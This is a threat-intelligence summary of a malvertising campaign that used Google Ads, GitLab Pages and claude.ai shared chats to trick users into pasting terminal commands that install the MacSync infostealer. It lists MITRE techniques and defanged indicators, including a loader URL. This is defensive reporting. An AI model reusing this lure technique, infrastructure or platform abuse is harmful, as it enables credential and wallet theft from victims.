A ClickFix malvertising campaign hijacked Google Ads and trusted hosting to lure over 2,000 victims toward fake AI tool downloads before pivoting to abuse claude.ai shared chats as a delivery channel for credential-stealing malware. TrendAI Research observed six attack waves, dozens of rotating hostnames, and heavy targeting of the Asia-Pacific region, especially Taiwan, before Anthropic disabled the malicious accounts and shared conversations. #ClaudeAI #GitLabPages #MacSync #Anthropic #TrendAIResearch
Keypoints
- The campaign used Google Ads to impersonate popular AI developer tools and drive victims to malicious download pages.
- At least six legitimate brands were abused as lures, including Claude AI, ChatGPT Codex, Perplexity, Cursor IDE, and JetBrains.
- TrendAI Research tracked 106 unique malicious hostnames across six attack waves over seven weeks.
- The attackers later shifted from GitLab Pages to claude.ai’s shared chat feature, using a trusted domain to bypass common security warnings.
- The payload chain delivered the MacSync infostealer, which collected browser credentials, cookies, SSH keys, and cryptocurrency wallet files.
- The Asia-Pacific region accounted for the majority of confirmed victim traffic, with Taiwan the most affected country.
- After notification, Anthropic investigated, banned the responsible accounts, and disabled the malicious shared conversations.
MITRE Techniques
- [T1566.002 ] Phishing: Spearphishing Link – Victims clicked Google Ads and redirected links to malicious pages or claude.ai shared chats disguised as legitimate AI tool content (‘search queries for “claude”, “claude download” redirected to the previously mentioned malicious /share/ urls’).
- [T1204.004 ] User Execution: Malicious Copy and Paste – The attack relied on victims manually copying terminal commands into Terminal to launch the payload (‘open Terminal and paste a command’).
- [T1059.004 ] Command and Scripting Interpreter: Unix Shell – The loader used shell commands and zsh scripts to fetch and execute the next stage on macOS (‘a single curl piped through base64 -d’ and ‘another zsh script with base64-encoded data will be decoded and executed’).
- [T1027 ] Obfuscated Files or Information – The payload and commands were base64-encoded to hide their purpose and evade inspection (‘base64-encoded data’ and ‘The encoded blob in the screenshots decodes to’).
- [T1105 ] Ingress Tool Transfer – The loader fetched a second-stage script and then retrieved the MacSync infostealer from a remote host (‘the loader script fetches and executes the MacSync infostealer’).
- [T1583.001 ] Acquire Infrastructure: Domains – The actors registered and rotated many malicious hostnames and subdomains to host lure pages (‘106 unique malicious hostnames’ and ‘created dozens of subdomains mimicking legitimate software download pages’).
- [T1583.006 ] Acquire Infrastructure: Web Services – The campaign abused GitLab Pages and claude.ai shared chat as hosting and delivery infrastructure (‘abused GitLab Pages’ and ‘weaponized claude.ai’s shared chat feature’).
Indicators of Compromise
- [Domains/Hostnames ] Malicious lure and staging sites – claude-code-app.gitlab[.]io, claudeapp.gitlab[.]io, perplexity-platform.gitlab.io, and other rotating GitLab Pages hostnames.
- [Domains/Hostnames ] Additional impersonation pages – claude-desktop-lm.gitlab[.]io, cladesktop.gitlab[.]io, codexgpt.gitlab[.]io, and chatgpt-codex-app.gitlab[.]io.
- [URL ] Payload retrieval endpoint – hxxps://loserrq0j1sha8[.]com/debug/loader.sh?build=a39427f9d5bfda11277f1a58c89b7c2d, used to download the initial loader script.
- [Shared Chat URL Pattern ] Weaponized Claude shared conversations – claude[.]ai/share/?gad_source=1&gad_campaignid=&gbraid=…&gclid=…, used as the trusted delivery mechanism.
- [Google Ads Campaign ID ] Paid search infrastructure – 23736589328, a campaign ID that drove much of the early traffic.
- [Shared Conversation IDs ] Malicious Claude share links – 498818d9-1ddc-4fbb-9fa7-56dfb84840b0 and at least 45 other unique share IDs.
- [File/Script Name ] Payload and malware chain – loader.sh and the MacSync infostealer, referenced as the executed shell script and final payload.
Read more: https://www.trendmicro.com/en_us/research/26/f/claudeai-shared-chat-abused-in-malvertising.html